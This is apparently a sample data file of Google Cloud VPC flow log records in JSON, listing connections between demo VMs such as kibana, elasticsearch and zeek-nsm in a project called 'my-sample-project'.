+{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"67.43.156.13","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"67.43.156.13","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.168.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"67.43.156.13","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"67.43.156.13","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"67.43.156.13","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"67.43.156.13","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"67.43.156.14","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"67.43.156.13","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 